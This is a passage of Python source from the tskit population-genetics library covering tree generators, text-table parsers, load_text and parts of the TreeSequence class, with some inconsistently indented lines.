        is supported, which can also be specified by ``method=None``
        (Default: ``None``).
    :param bool record_provenance: If True, add details of this operation to the
        provenance information of the returned tree sequence. (Default: True).
    :param int random_seed: The random seed. If this is None, a random seed will
        be automatically generated. Valid random seeds must be between 1 and
        :math:`2^{32} − 1`.
    :param \\**kwargs: Further arguments used as parameters when constructing the
        returned :class:`Tree`. For example
        ``tree.split_polytomies(sample_lists=True)`` will
        return a :class:`Tree` created with ``sample_lists=True``.
    :return: A new tree with polytomies split into random bifurcations.
    :rtype: tskit.Tree
    """
    # All the work is delegated to the combinatorics module.
    return combinatorics.split_polytomies(
        self,
        epsilon=epsilon,
        method=method,
        record_provenance=record_provenance,
        random_seed=random_seed,
        **kwargs,
    )
@staticmethod
def generate_star(
    num_leaves, *, span=1, branch_length=1, record_provenance=True, **kwargs
):
    """
    Generate a :class:`Tree` whose leaf nodes all have the same parent (i.e.
    a "star" tree). The leaf nodes are all placed at time 0 and are marked as
    sample nodes.

    The tree produced by this method is identical to
    ``tskit.Tree.unrank(n, (0, 0))``, but generated more efficiently for large ``n``.

    :param int num_leaves: The number of leaf nodes in the returned tree (must be
        2 or greater).
    :param float span: The span of the tree, and therefore the
        :attr:`~TreeSequence.sequence_length` of the :attr:`.tree_sequence`
        property of the returned :class:`Tree`.
    :param float branch_length: The length of every branch in the tree (equivalent
        to the time of the root node).
    :param bool record_provenance: If True, add details of this operation to the
        provenance information of the returned tree sequence. (Default: True).
    :param \\**kwargs: Further arguments used as parameters when constructing the
        returned :class:`Tree`. For example
        ``tskit.Tree.generate_star(sample_lists=True)`` will
        return a :class:`Tree` created with ``sample_lists=True``.
    :return: A star-shaped tree. Its corresponding :class:`TreeSequence` is available
        via the :attr:`.tree_sequence` attribute.
    :rtype: Tree
    """
    # Construction is delegated to the combinatorics module.
    return combinatorics.generate_star(
        num_leaves,
        span=span,
        branch_length=branch_length,
        record_provenance=record_provenance,
        **kwargs,
    )
@staticmethod
def generate_balanced(
    num_leaves,
    *,
    arity=2,
    span=1,
    branch_length=1,
    record_provenance=True,
    **kwargs,
):
    """
    Generate a :class:`Tree` with the specified number of leaves that is maximally
    balanced. By default, the tree returned is binary, such that for each
    node that subtends :math:`n` leaves, the left child will subtend
    :math:`\\lfloor{n / 2}\\rfloor` leaves and the right child the
    remainder. Balanced trees with higher arity can also be generated using the
    ``arity`` parameter, where the leaves subtending a node are distributed
    among its children analogously.

    In the returned tree, the leaf nodes are all at time 0, marked as samples,
    and labelled 0 to n from left-to-right. Internal node IDs are assigned
    sequentially from n in a postorder traversal, and the time of an internal
    node is the maximum time of its children plus the specified ``branch_length``.

    :param int num_leaves: The number of leaf nodes in the returned tree (must
        be 2 or greater).
    :param int arity: The maximum number of children a node can have in the returned
        tree.
    :param float span: The span of the tree, and therefore the
        :attr:`~TreeSequence.sequence_length` of the :attr:`.tree_sequence`
        property of the returned :class:`Tree`.
    :param float branch_length: The minimum length of a branch in the tree (see
        above for details on how internal node times are assigned).
    :param bool record_provenance: If True, add details of this operation to the
        provenance information of the returned tree sequence. (Default: True).
    :param \\**kwargs: Further arguments used as parameters when constructing the
        returned :class:`Tree`. For example
        ``tskit.Tree.generate_balanced(sample_lists=True)`` will
        return a :class:`Tree` created with ``sample_lists=True``.
    :return: A balanced tree. Its corresponding :class:`TreeSequence` is available
        via the :attr:`.tree_sequence` attribute.
    :rtype: Tree
    """
    # Construction is delegated to the combinatorics module.
    return combinatorics.generate_balanced(
        num_leaves,
        arity=arity,
        span=span,
        branch_length=branch_length,
        record_provenance=record_provenance,
        **kwargs,
    )
@staticmethod
def generate_comb(
    num_leaves, *, span=1, branch_length=1, record_provenance=True, **kwargs
):
    """
    Generate a :class:`Tree` in which all internal nodes have two children
    and the left child is a leaf. This is a "comb", "ladder" or "pectinate"
    phylogeny, and also known as a `caterpillar tree
    <https://en.wikipedia.org/wiki/Caterpillar_tree>`_.

    The leaf nodes are all at time 0, marked as samples,
    and labelled 0 to n from left-to-right. Internal node IDs are assigned
    sequentially from n as we ascend the tree, and the time of an internal
    node is the maximum time of its children plus the specified ``branch_length``.

    :param int num_leaves: The number of leaf nodes in the returned tree (must be
        2 or greater).
    :param float span: The span of the tree, and therefore the
        :attr:`~TreeSequence.sequence_length` of the :attr:`.tree_sequence`
        property of the returned :class:`Tree`.
    :param float branch_length: The branch length between each internal node; the
        root node is therefore placed at time ``branch_length * (num_leaves - 1)``.
    :param bool record_provenance: If True, add details of this operation to the
        provenance information of the returned tree sequence. (Default: True).
    :param \\**kwargs: Further arguments used as parameters when constructing the
        returned :class:`Tree`. For example
        ``tskit.Tree.generate_comb(sample_lists=True)`` will
        return a :class:`Tree` created with ``sample_lists=True``.
    :return: A comb-shaped bifurcating tree. Its corresponding :class:`TreeSequence`
        is available via the :attr:`.tree_sequence` attribute.
    :rtype: Tree
    """
    # Construction is delegated to the combinatorics module.
    return combinatorics.generate_comb(
        num_leaves,
        span=span,
        branch_length=branch_length,
        record_provenance=record_provenance,
        **kwargs,
    )
@staticmethod
def generate_random_binary(
    num_leaves,
    *,
    span=1,
    branch_length=1,
    random_seed=None,
    record_provenance=True,
    **kwargs,
):
    """
    Generate a random binary :class:`Tree` with :math:`n` = ``num_leaves``
    leaves with an equal probability of returning any topology and
    leaf label permutation among the :math:`(2n - 3)! / (2^{n - 2} (n - 2)!)`
    leaf-labelled binary trees.

    The leaf nodes are marked as samples, labelled 0 to n, and placed at
    time 0. Internal node IDs are assigned sequentially from n as we ascend
    the tree, and the time of an internal node is the maximum time of its
    children plus the specified ``branch_length``.

    .. note::
        The returned tree has not been created under any explicit model of
        evolution. In order to simulate such trees, additional software
        such as `msprime <https://github.com/tskit-dev/msprime>`_ is required.

    :param int num_leaves: The number of leaf nodes in the returned tree (must
        be 2 or greater).
    :param float span: The span of the tree, and therefore the
        :attr:`~TreeSequence.sequence_length` of the :attr:`.tree_sequence`
        property of the returned :class:`Tree`.
    :param float branch_length: The minimum time between parent and child nodes.
    :param int random_seed: The random seed. If this is None, a random seed will
        be automatically generated. Valid random seeds must be between 1 and
        :math:`2^{32} − 1`.
    :param bool record_provenance: If True, add details of this operation to the
        provenance information of the returned tree sequence. (Default: True).
    :param \\**kwargs: Further arguments used as parameters when constructing the
        returned :class:`Tree`. For example
        ``tskit.Tree.generate_random_binary(sample_lists=True)`` will
        return a :class:`Tree` created with ``sample_lists=True``.
    :return: A random binary tree. Its corresponding :class:`TreeSequence` is
        available via the :attr:`.tree_sequence` attribute.
    :rtype: Tree
    """
    # Construction is delegated to the combinatorics module.
    return combinatorics.generate_random_binary(
        num_leaves,
        span=span,
        branch_length=branch_length,
        random_seed=random_seed,
        record_provenance=record_provenance,
        **kwargs,
    )
def load(file):
    """
    Loads a tree sequence from the specified file object or path. The file must be in the
    :ref:`tree sequence file format <sec_tree_sequence_file_format>` produced by the
    :meth:`TreeSequence.dump` method.

    :param str file: The file object or path of the ``.trees`` file containing the
        tree sequence we wish to load.
    :return: The tree sequence object containing the information
        stored in the specified file path.
    :rtype: :class:`tskit.TreeSequence`
    """
    # Thin module-level convenience wrapper around the classmethod.
    return TreeSequence.load(file)
def parse_individuals(
    source, strict=True, encoding="utf8", base64_metadata=True, table=None
):
    """
    Parse a whitespace-delimited text description of an individual table from
    the given file-like object and return the resulting
    :class:`IndividualTable`. The expected layout is described in the
    :ref:`individual text format <sec_individual_text_format>` section and the
    column semantics in the :ref:`individual table definition
    <sec_individual_table_definition>` section.

    See :func:`tskit.load_text` for a detailed explanation of the ``strict``
    parameter.

    :param io.TextIOBase source: The file-like object containing the text.
    :param bool strict: If True (default), columns must be tab-separated;
        otherwise any run of whitespace is accepted as a separator.
    :param str encoding: Encoding used for text representation.
    :param bool base64_metadata: If True, the metadata column is decoded from
        Base64; otherwise it is taken as plain text.
    :param IndividualTable table: If specified write into this table. If not,
        create a new :class:`IndividualTable` instance.
    """
    delimiter = "\t" if strict else None
    if table is None:
        table = tables.IndividualTable()
    # The header line determines which optional columns are present.
    header = source.readline().strip("\n").split(delimiter)
    flags_index = header.index("flags")

    def find_optional(name):
        # Position of an optional column, or None when it is absent.
        return header.index(name) if name in header else None

    location_index = find_optional("location")
    parents_index = find_optional("parents")
    metadata_index = find_optional("metadata")
    for line in source:
        tokens = line.split(delimiter)
        if len(tokens) >= 1:
            flags = int(tokens[flags_index])
            location = ()
            if location_index is not None and len(tokens[location_index]) > 0:
                location = tuple(
                    float(coord) for coord in tokens[location_index].split(",")
                )
            parents = ()
            if parents_index is not None and len(tokens[parents_index]) > 0:
                parents = tuple(
                    int(parent) for parent in tokens[parents_index].split(",")
                )
            metadata = b""
            if metadata_index is not None and metadata_index < len(tokens):
                metadata = tokens[metadata_index].encode(encoding)
                if base64_metadata:
                    metadata = base64.b64decode(metadata)
            table.add_row(
                flags=flags, location=location, parents=parents, metadata=metadata
            )
    return table
def parse_nodes(source, strict=True, encoding="utf8", base64_metadata=True, table=None):
    """
    Parse a whitespace-delimited textual description of a node table.

    See the :ref:`node text format <sec_node_text_format>` section for the
    required format and the :ref:`node table definition
    <sec_node_table_definition>` section for the required properties of the
    contents. See :func:`tskit.load_text` for a detailed explanation of the
    ``strict`` parameter.

    :param io.TextIOBase source: The file-like object containing the text.
    :param bool strict: If True, require strict tab delimiting (default). If
        False, a relaxed whitespace splitting algorithm is used.
    :param str encoding: Encoding used for text representation.
    :param bool base64_metadata: If True, metadata is encoded using Base64
        encoding; otherwise, as plain text.
    :param NodeTable table: If specified write into this table. If not,
        create a new :class:`NodeTable` instance.
    :return: The populated :class:`NodeTable`.
    """
    delimiter = "\t" if strict else None
    if table is None:
        table = tables.NodeTable()
    # The header defines which columns are present; only is_sample and
    # time are mandatory.
    header = source.readline().strip("\n").split(delimiter)
    is_sample_index = header.index("is_sample")
    time_index = header.index("time")
    population_index = header.index("population") if "population" in header else None
    individual_index = header.index("individual") if "individual" in header else None
    metadata_index = header.index("metadata") if "metadata" in header else None
    for line in source:
        tokens = line.split(delimiter)
        # Rows with fewer than the two mandatory fields are ignored.
        if len(tokens) < 2:
            continue
        flags = NODE_IS_SAMPLE if int(tokens[is_sample_index]) != 0 else 0
        time = float(tokens[time_index])
        population = (
            NULL if population_index is None else int(tokens[population_index])
        )
        individual = (
            NULL if individual_index is None else int(tokens[individual_index])
        )
        metadata = b""
        if metadata_index is not None and metadata_index < len(tokens):
            metadata = tokens[metadata_index].encode(encoding)
            if base64_metadata:
                metadata = base64.b64decode(metadata)
        table.add_row(
            flags=flags,
            time=time,
            population=population,
            individual=individual,
            metadata=metadata,
        )
    return table
def parse_edges(source, strict=True, table=None):
    """
    Parse a whitespace-delimited textual description of an edge table.

    See the :ref:`edge text format <sec_edge_text_format>` section for the
    required format and the :ref:`edge table definition
    <sec_edge_table_definition>` section for the required properties of the
    contents. See :func:`tskit.load_text` for a detailed explanation of the
    ``strict`` parameter.

    :param io.TextIOBase source: The file-like object containing the text.
    :param bool strict: If True, require strict tab delimiting (default). If
        False, a relaxed whitespace splitting algorithm is used.
    :param EdgeTable table: If specified, write the edges into this table. If
        not, create a new :class:`EdgeTable` instance and return.
    :return: The populated :class:`EdgeTable`.
    """
    delimiter = "\t" if strict else None
    if table is None:
        table = tables.EdgeTable()
    header = source.readline().strip("\n").split(delimiter)
    column = {name: header.index(name) for name in ("left", "right", "parent", "child")}
    for line in source:
        tokens = line.split(delimiter)
        # Skip rows that do not carry all four mandatory fields.
        if len(tokens) < 4:
            continue
        left = float(tokens[column["left"]])
        right = float(tokens[column["right"]])
        parent = int(tokens[column["parent"]])
        # The child field may hold several comma-separated IDs; emit one
        # edge row per child.
        for child in map(int, tokens[column["child"]].split(",")):
            table.add_row(left=left, right=right, parent=parent, child=child)
    return table
def parse_sites(source, strict=True, encoding="utf8", base64_metadata=True, table=None):
    """
    Parse a whitespace-delimited textual description of a site table.

    See the :ref:`site text format <sec_site_text_format>` section for the
    required format and the :ref:`site table definition
    <sec_site_table_definition>` section for the required properties of the
    contents. See :func:`tskit.load_text` for a detailed explanation of the
    ``strict`` parameter.

    :param io.TextIOBase source: The file-like object containing the text.
    :param bool strict: If True, require strict tab delimiting (default). If
        False, a relaxed whitespace splitting algorithm is used.
    :param str encoding: Encoding used for text representation.
    :param bool base64_metadata: If True, metadata is encoded using Base64
        encoding; otherwise, as plain text.
    :param SiteTable table: If specified write site into this table. If not,
        create a new :class:`SiteTable` instance.
    :return: The populated :class:`SiteTable`.
    """
    delimiter = "\t" if strict else None
    if table is None:
        table = tables.SiteTable()
    header = source.readline().strip("\n").split(delimiter)
    position_index = header.index("position")
    ancestral_state_index = header.index("ancestral_state")
    metadata_index = header.index("metadata") if "metadata" in header else None
    for line in source:
        tokens = line.split(delimiter)
        # Rows missing the mandatory position/ancestral_state are skipped.
        if len(tokens) < 2:
            continue
        metadata = b""
        if metadata_index is not None and metadata_index < len(tokens):
            metadata = tokens[metadata_index].encode(encoding)
            if base64_metadata:
                metadata = base64.b64decode(metadata)
        table.add_row(
            position=float(tokens[position_index]),
            ancestral_state=tokens[ancestral_state_index],
            metadata=metadata,
        )
    return table
def parse_mutations(
    source, strict=True, encoding="utf8", base64_metadata=True, table=None
):
    """
    Parse a whitespace-delimited textual description of a mutation table.

    See the :ref:`mutation text format <sec_mutation_text_format>` section
    for the required format and the :ref:`mutation table definition
    <sec_mutation_table_definition>` section for the required properties of
    the contents. If the ``time`` column is absent, every row's time is
    filled with ``UNKNOWN_TIME``. See :func:`tskit.load_text` for a
    detailed explanation of the ``strict`` parameter.

    :param io.TextIOBase source: The file-like object containing the text.
    :param bool strict: If True, require strict tab delimiting (default). If
        False, a relaxed whitespace splitting algorithm is used.
    :param str encoding: Encoding used for text representation.
    :param bool base64_metadata: If True, metadata is encoded using Base64
        encoding; otherwise, as plain text.
    :param MutationTable table: If specified, write mutations into this table.
        If not, create a new :class:`MutationTable` instance.
    :return: The populated :class:`MutationTable`.
    """
    delimiter = "\t" if strict else None
    if table is None:
        table = tables.MutationTable()
    header = source.readline().strip("\n").split(delimiter)
    site_index = header.index("site")
    node_index = header.index("node")
    time_index = header.index("time") if "time" in header else None
    derived_state_index = header.index("derived_state")
    parent_index = header.index("parent") if "parent" in header else None
    metadata_index = header.index("metadata") if "metadata" in header else None
    for line in source:
        tokens = line.split(delimiter)
        # Rows missing the three mandatory fields are ignored.
        if len(tokens) < 3:
            continue
        # A missing time column or the literal string "unknown" both map
        # to the UNKNOWN_TIME sentinel.
        if time_index is not None and tokens[time_index] != "unknown":
            time = float(tokens[time_index])
        else:
            time = UNKNOWN_TIME
        parent = NULL if parent_index is None else int(tokens[parent_index])
        metadata = b""
        if metadata_index is not None and metadata_index < len(tokens):
            metadata = tokens[metadata_index].encode(encoding)
            if base64_metadata:
                metadata = base64.b64decode(metadata)
        table.add_row(
            site=int(tokens[site_index]),
            node=int(tokens[node_index]),
            time=time,
            derived_state=tokens[derived_state_index],
            parent=parent,
            metadata=metadata,
        )
    return table
def parse_populations(
    source, strict=True, encoding="utf8", base64_metadata=True, table=None
):
    """
    Parse a whitespace-delimited textual description of a population table.

    See the :ref:`population text format <sec_population_text_format>`
    section for the required format and the :ref:`population table
    definition <sec_population_table_definition>` section for the required
    properties of the contents. See :func:`tskit.load_text` for a detailed
    explanation of the ``strict`` parameter.

    :param io.TextIOBase source: The file-like object containing the text.
    :param bool strict: If True, require strict tab delimiting (default). If
        False, a relaxed whitespace splitting algorithm is used.
    :param str encoding: Encoding used for text representation.
    :param bool base64_metadata: If True, metadata is encoded using Base64
        encoding; otherwise, as plain text.
    :param PopulationTable table: If specified write into this table. If not,
        create a new :class:`PopulationTable` instance.
    :return: The populated :class:`PopulationTable`.
    """
    delimiter = "\t" if strict else None
    if table is None:
        table = tables.PopulationTable()
    # A population row carries only metadata; locate that single column.
    metadata_index = source.readline().strip("\n").split(delimiter).index("metadata")
    for line in source:
        tokens = line.split(delimiter)
        if len(tokens) < 1:
            continue
        metadata = tokens[metadata_index].encode(encoding)
        if base64_metadata:
            metadata = base64.b64decode(metadata)
        table.add_row(metadata=metadata)
    return table
def load_text(
    nodes,
    edges,
    sites=None,
    mutations=None,
    individuals=None,
    populations=None,
    sequence_length=0,
    strict=True,
    encoding="utf8",
    base64_metadata=True,
):
    """
    Parses the tree sequence data from the specified file-like objects, and
    returns the resulting :class:`TreeSequence` object. The format
    for these files is documented in the :ref:`sec_text_file_format` section,
    and is produced by the :meth:`TreeSequence.dump_text` method. Further
    properties required for an input tree sequence are described in the
    :ref:`sec_valid_tree_sequence_requirements` section. This method is intended as a
    convenient interface for importing external data into tskit; the binary
    file format using by :meth:`tskit.load` is many times more efficient than
    this text format.

    The ``nodes`` and ``edges`` parameters are mandatory and must be file-like
    objects containing text with whitespace delimited columns, parsable by
    :func:`parse_nodes` and :func:`parse_edges`, respectively. ``sites``,
    ``mutations``, ``individuals`` and ``populations`` are optional, and must
    be parsable by :func:`parse_sites`, :func:`parse_mutations`,
    :func:`parse_individuals`, and :func:`parse_populations`, respectively.

    The ``sequence_length`` parameter determines the
    :attr:`TreeSequence.sequence_length` of the returned tree sequence. If it
    is 0 or not specified, the value is taken to be the maximum right
    coordinate of the input edges. This parameter is useful in degenerate
    situations (such as when there are zero edges), but can usually be ignored.

    The ``strict`` parameter controls the field delimiting algorithm that
    is used. If ``strict`` is True (the default), we require exactly one
    tab character separating each field. If ``strict`` is False, a more relaxed
    whitespace delimiting algorithm is used, such that any run of whitespace
    is regarded as a field separator. In most situations, ``strict=False``
    is more convenient, but it can lead to error in certain situations. For
    example, if a deletion is encoded in the mutation table this will not
    be parseable when ``strict=False``.

    After parsing the tables, :meth:`TableCollection.sort` is called to ensure that
    the loaded tables satisfy the tree sequence :ref:`ordering requirements
    <sec_valid_tree_sequence_requirements>`. Note that this may result in the
    IDs of various entities changing from their positions in the input file.

    :param io.TextIOBase nodes: The file-like object containing text describing a
        :class:`NodeTable`.
    :param io.TextIOBase edges: The file-like object containing text
        describing an :class:`EdgeTable`.
    :param io.TextIOBase sites: The file-like object containing text describing a
        :class:`SiteTable`.
    :param io.TextIOBase mutations: The file-like object containing text
        describing a :class:`MutationTable`.
    :param io.TextIOBase individuals: The file-like object containing text
        describing a :class:`IndividualTable`.
    :param io.TextIOBase populations: The file-like object containing text
        describing a :class:`PopulationTable`.
    :param float sequence_length: The sequence length of the returned tree sequence. If
        not supplied or zero this will be inferred from the set of edges.
    :param bool strict: If True, require strict tab delimiting (default). If
        False, a relaxed whitespace splitting algorithm is used.
    :param str encoding: Encoding used for text representation.
    :param bool base64_metadata: If True, metadata is encoded using Base64
        encoding; otherwise, as plain text.
    :return: The tree sequence object containing the information
        stored in the specified file paths.
    :rtype: :class:`tskit.TreeSequence`
    """
    # We need to parse the edges so we can figure out the sequence length, and
    # TableCollection.sequence_length is immutable so we need to create a temporary
    # edge table.
    edge_table = parse_edges(edges, strict=strict)
    if sequence_length == 0 and len(edge_table) > 0:
        sequence_length = edge_table.right.max()
    tc = tables.TableCollection(sequence_length)
    # Copy the temporary edge table's columns into the collection wholesale.
    tc.edges.set_columns(
        left=edge_table.left,
        right=edge_table.right,
        parent=edge_table.parent,
        child=edge_table.child,
    )
    parse_nodes(
        nodes,
        strict=strict,
        encoding=encoding,
        base64_metadata=base64_metadata,
        table=tc.nodes,
    )
    # We need to add any populations referenced in the node table, so that
    # population IDs used by nodes are valid even when no populations file
    # is supplied.
    if len(tc.nodes) > 0:
        max_population = tc.nodes.population.max()
        if max_population != NULL:
            for _ in range(max_population + 1):
                tc.populations.add_row()
    if sites is not None:
        parse_sites(
            sites,
            strict=strict,
            encoding=encoding,
            base64_metadata=base64_metadata,
            table=tc.sites,
        )
    if mutations is not None:
        parse_mutations(
            mutations,
            strict=strict,
            encoding=encoding,
            base64_metadata=base64_metadata,
            table=tc.mutations,
        )
    if individuals is not None:
        parse_individuals(
            individuals,
            strict=strict,
            encoding=encoding,
            base64_metadata=base64_metadata,
            table=tc.individuals,
        )
    if populations is not None:
        # NOTE(review): rows added above for node-referenced populations are
        # kept; parsed rows are appended after them — confirm this ordering
        # is intended when both paths run.
        parse_populations(
            populations,
            strict=strict,
            encoding=encoding,
            base64_metadata=base64_metadata,
            table=tc.populations,
        )
    # Sorting enforces the tree sequence ordering requirements; entity IDs
    # may change relative to their positions in the input files.
    tc.sort()
    return tc.tree_sequence()
class TreeIterator:
    """
    Bidirectional iterator over the trees of a tree sequence. Forward
    iteration is the default; calling :func:`reversed` on the iterator
    switches it to backward traversal.
    """

    def __init__(self, tree):
        self.tree = tree
        self.more_trees = True
        self.forward = True

    def __iter__(self):
        return self

    def __reversed__(self):
        # Flip the direction of travel; subsequent __next__ calls step
        # backwards through the sequence.
        self.forward = False
        return self

    def __next__(self):
        advance = self.tree.next if self.forward else self.tree.prev
        # Once exhausted, stay exhausted: short-circuit on more_trees.
        self.more_trees = self.more_trees and advance()
        if not self.more_trees:
            raise StopIteration()
        return self.tree

    def __len__(self):
        return self.tree.tree_sequence.num_trees
class SimpleContainerSequence:
    """
    Adapter presenting an index-based accessor (e.g. ``ts.edge(i)``,
    ``ts.node(i)``) as a Python sequence, supporting ``len``, indexing
    (including negative indices), and forward/reverse iteration.
    """

    def __init__(self, getter, length):
        self.getter = getter
        self.length = length

    def __len__(self):
        return self.length

    def __getitem__(self, index):
        # Translate negative indices, then bounds-check like a list.
        if index < 0:
            index += self.length
        if not 0 <= index < self.length:
            raise IndexError("Index out of bounds")
        return self.getter(index)
class TreeSequence:
"""
A single tree sequence, as defined by the :ref:`data model <sec_data_model>`.
A TreeSequence instance can be created from a set of
:ref:`tables <sec_table_definitions>` using
:meth:`TableCollection.tree_sequence`, or loaded from a set of text files
using :func:`tskit.load_text`, or loaded from a native binary file using
:func:`tskit.load`.
TreeSequences are immutable. To change the data held in a particular
tree sequence, first get the table information as a :class:`TableCollection`
instance (using :meth:`.dump_tables`), edit those tables using the
:ref:`tables api <sec_tables_api>`, and create a new tree sequence using
:meth:`TableCollection.tree_sequence`.
The :meth:`.trees` method iterates over all trees in a tree sequence, and
the :meth:`.variants` method iterates over all sites and their genotypes.
"""
    @dataclass(frozen=True)
    class _TableMetadataSchemas:
        """
        Immutable container with one field per table, each holding that
        table's parsed metadata schema (``None`` until populated).
        """

        # One field per table; field names must match the attribute names
        # returned by the low-level get_table_metadata_schemas() call.
        node: metadata_module.MetadataSchema = None
        edge: metadata_module.MetadataSchema = None
        site: metadata_module.MetadataSchema = None
        mutation: metadata_module.MetadataSchema = None
        migration: metadata_module.MetadataSchema = None
        individual: metadata_module.MetadataSchema = None
        population: metadata_module.MetadataSchema = None
def __init__(self, ll_tree_sequence):
self._ll_tree_sequence = ll_tree_sequence
metadata_schema_strings = self._ll_tree_sequence.get_table_metadata_schemas()
metadata_schema_instances = {
name: metadata_module.parse_metadata_schema(
getattr(metadata_schema_strings, name)
)
for name in vars(self._TableMetadataSchemas)
if not name.startswith("_")
}
self._table_metadata_schemas = self._TableMetadataSchemas(
**metadata_schema_instances
)
# Implement the pickle protocol for TreeSequence
def __getstate__(self):
return self.dump_tables()
def __setstate__(self, tc):
self.__init__(tc.tree_sequence().ll_tree_sequence)
def __eq__(self, other):
return self.tables == other.tables
    def equals(
        self,
        other,
        *,
        ignore_metadata=False,
        ignore_ts_metadata=False,
        ignore_provenance=False,
        ignore_timestamps=False,
    ):
        """
        Returns True if `self` and `other` are equal. Uses the underlying table
        equality; see :meth:`TableCollection.equals` for details and options.
        """
        return self.tables.equals(
            other.tables,
            ignore_metadata=ignore_metadata,
            ignore_ts_metadata=ignore_ts_metadata,
            ignore_provenance=ignore_provenance,
            ignore_timestamps=ignore_timestamps,
        )
@property
def ll_tree_sequence(self):
return self.get_ll_tree_sequence()
def get_ll_tree_sequence(self):
return self._ll_tree_sequence
def aslist(self, **kwargs):
"""
Returns the trees in this tree sequence as a list. Each tree is
represented by a different instance of :class:`Tree`. As such, this
method is inefficient and may use a large amount of memory, and should
not be used when performance is a consideration. The :meth:`.trees`
method is the recommended way to efficiently iterate over the trees
in a tree sequence.
:param \\**kwargs: Further arguments used as parameters when constructing the
returned trees. For example ``ts.aslist(sample_lists=True)`` will result
in a list of :class:`Tree` instances created with ``sample_lists=True``.
:return: A list of the trees in this tree sequence.
:rtype: list
"""
return [tree.copy() for tree in self.trees(**kwargs)]
    @classmethod
    def load(cls, file_or_path):
        # Load a tree sequence from a path or an open binary file-like
        # object. Paths are opened (and closed) here; caller-supplied file
        # objects are left open.
        file, local_file = util.convert_file_like_to_open_file(file_or_path, "rb")
        try:
            ts = _tskit.TreeSequence()
            ts.load(file)
            # NOTE(review): constructs TreeSequence rather than cls, so a
            # subclass calling load() gets a base-class instance — confirm
            # this is intended.
            return TreeSequence(ts)
        except exceptions.FileFormatError as e:
            # TODO Fix this for new file semantics
            formats.raise_hdf5_format_error(file_or_path, e)
        finally:
            # Only close handles this function opened itself.
            if local_file:
                file.close()
@classmethod
def load_tables(cls, tables, *, build_indexes=False):
ts = _tskit.TreeSequence()
ts.load_tables(tables._ll_tables, build_indexes=build_indexes)
return TreeSequence(ts)
def dump(self, file_or_path, zlib_compression=False):
"""
Writes the tree sequence to the specified path or file object.
:param str file_or_path: The file object or path to write the TreeSequence to.
:param bool zlib_compression: This parameter is deprecated and ignored.
"""
if zlib_compression:
# Note: the msprime CLI before version 1.0 uses this option, so we need
# to keep it indefinitely.
warnings.warn(
"The zlib_compression option is no longer supported and is ignored",
RuntimeWarning,
)
file, local_file = util.convert_file_like_to_open_file(file_or_path, "wb")
try:
self._ll_tree_sequence.dump(file)
finally:
if local_file:
file.close()
@property
def tables_dict(self):
"""
Returns a dictionary mapping names to tables in the
underlying :class:`.TableCollection`. Equivalent to calling
``ts.tables.name_map``.
"""
return self.tables.name_map
    @property
    def tables(self):
        """
        A copy of the tables underlying this tree sequence. See also
        :meth:`.dump_tables`.

        .. warning:: This property currently returns a copy of the tables
            underlying a tree sequence but it may return a read-only
            **view** in the future. Thus, if the tables will subsequently be
            updated, please use the :meth:`.dump_tables` method instead as
            this will always return a new copy of the TableCollection.

        :return: A :class:`TableCollection` containing a copy of all the
            tables underlying this tree sequence.
        :rtype: TableCollection
        """
        return self.dump_tables()
@property
def nbytes(self):
"""
Returns the total number of bytes required to store the data
in this tree sequence. Note that this may not be equal to
the actual memory footprint.
"""
return self.tables.nbytes
def dump_tables(self):
"""
A copy of the tables defining this tree sequence.
:return: A :class:`TableCollection` containing all tables underlying
the tree sequence.
:rtype: TableCollection
"""
t = tables.TableCollection(sequence_length=self.sequence_length)
self._ll_tree_sequence.dump_tables(t._ll_tables)
return t
    def dump_text(
        self,
        nodes=None,
        edges=None,
        sites=None,
        mutations=None,
        individuals=None,
        populations=None,
        provenances=None,
        precision=6,
        encoding="utf8",
        base64_metadata=True,
    ):
        """
        Writes a text representation of the tables underlying the tree sequence
        to the specified connections. Each table is written only when its
        output stream is supplied.

        If Base64 encoding is not used, then metadata will be saved directly, possibly
        resulting in errors reading the tables back in if metadata includes whitespace.

        :param io.TextIOBase nodes: The file-like object (having a .write() method) to
            write the NodeTable to.
        :param io.TextIOBase edges: The file-like object to write the EdgeTable to.
        :param io.TextIOBase sites: The file-like object to write the SiteTable to.
        :param io.TextIOBase mutations: The file-like object to write the
            MutationTable to.
        :param io.TextIOBase individuals: The file-like object to write the
            IndividualTable to.
        :param io.TextIOBase populations: The file-like object to write the
            PopulationTable to.
        :param io.TextIOBase provenances: The file-like object to write the
            ProvenanceTable to.
        :param int precision: The number of digits of precision.
        :param str encoding: Encoding used for text representation.
        :param bool base64_metadata: If True, metadata is encoded using Base64
            encoding; otherwise, as plain text.
        """
        # Node table: one header line, then one tab-delimited row per node.
        if nodes is not None:
            print(
                "id",
                "is_sample",
                "time",
                "population",
                "individual",
                "metadata",
                sep="\t",
                file=nodes,
            )
            for node in self.nodes():
                metadata = node.metadata
                if base64_metadata:
                    metadata = base64.b64encode(metadata).decode(encoding)
                row = (
                    "{id:d}\t"
                    "{is_sample:d}\t"
                    "{time:.{precision}f}\t"
                    "{population:d}\t"
                    "{individual:d}\t"
                    "{metadata}"
                ).format(
                    precision=precision,
                    id=node.id,
                    is_sample=node.is_sample(),
                    time=node.time,
                    population=node.population,
                    individual=node.individual,
                    metadata=metadata,
                )
                print(row, file=nodes)
        # Edge table.
        if edges is not None:
            print("left", "right", "parent", "child", sep="\t", file=edges)
            for edge in self.edges():
                row = (
                    "{left:.{precision}f}\t"
                    "{right:.{precision}f}\t"
                    "{parent:d}\t"
                    "{child:d}"
                ).format(
                    precision=precision,
                    left=edge.left,
                    right=edge.right,
                    parent=edge.parent,
                    child=edge.child,
                )
                print(row, file=edges)
        # Site table.
        if sites is not None:
            print("position", "ancestral_state", "metadata", sep="\t", file=sites)
            for site in self.sites():
                metadata = site.metadata
                if base64_metadata:
                    metadata = base64.b64encode(metadata).decode(encoding)
                row = (
                    "{position:.{precision}f}\t" "{ancestral_state}\t" "{metadata}"
                ).format(
                    precision=precision,
                    position=site.position,
                    ancestral_state=site.ancestral_state,
                    metadata=metadata,
                )
                print(row, file=sites)
        # Mutation table: mutations are written grouped by site, and an
        # unknown time is serialized as the literal string "unknown".
        if mutations is not None:
            print(
                "site",
                "node",
                "time",
                "derived_state",
                "parent",
                "metadata",
                sep="\t",
                file=mutations,
            )
            for site in self.sites():
                for mutation in site.mutations:
                    metadata = mutation.metadata
                    if base64_metadata:
                        metadata = base64.b64encode(metadata).decode(encoding)
                    row = (
                        "{site}\t"
                        "{node}\t"
                        "{time}\t"
                        "{derived_state}\t"
                        "{parent}\t"
                        "{metadata}"
                    ).format(
                        site=mutation.site,
                        node=mutation.node,
                        time="unknown"
                        if util.is_unknown_time(mutation.time)
                        else mutation.time,
